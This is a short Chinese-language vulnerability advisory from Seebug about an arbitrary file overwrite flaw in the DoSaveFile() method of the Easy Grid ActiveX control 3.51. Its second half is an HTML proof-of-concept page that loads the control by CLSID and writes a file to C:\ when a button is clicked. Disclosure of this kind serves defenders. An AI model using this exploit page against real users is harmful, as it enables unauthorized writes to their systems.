Easy Grid ActiveX控件任意文件覆盖漏洞

2009-01-16T00:00:00
ID SSV:4674
Type seebug
Reporter Root
Modified 2009-01-16T00:00:00

Description

BUGTRAQ ID: 33272

Easy Grid ActiveX控件是用于打印、预览表格、图标、公式、表达式的工具。

EasyGrid.SGCtrl.32 ActiveX控件(EasyGrid.ocx)没有安全地调用DoSaveFile()方式,如果用户受骗访问了恶意网页并向该方式传送了特制参数的话,就会导致向用户系统写入任意文件。

Easy Grid Control Team Easy Grid ActiveX 3.51 厂商补丁:

Easy Grid Control Team

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.share2.com/easygrid/download.htm target=_blank rel=external nofollow>http://www.share2.com/easygrid/download.htm</a>

                                        
                                            
                                                &lt;HTML&gt;
&lt;BODY&gt;
&lt;object id=hsmx classid=&quot;clsid:{DD44C0EA-B2CF-31D1-8DD3-444553540000}&quot;&gt;&lt;/object&gt;

&lt;SCRIPT&gt;

function hehe()
{
     File = &quot;c:\\hsmx.txt&quot;
   hsmx.DoSaveFile(File)
}

&lt;/SCRIPT&gt;
&lt;input language=JavaScript onclick=hehe() type=button value=&quot;execute exploit&quot;&gt;&lt;br&gt;
&lt;/body&gt;
&lt;/HTML&gt;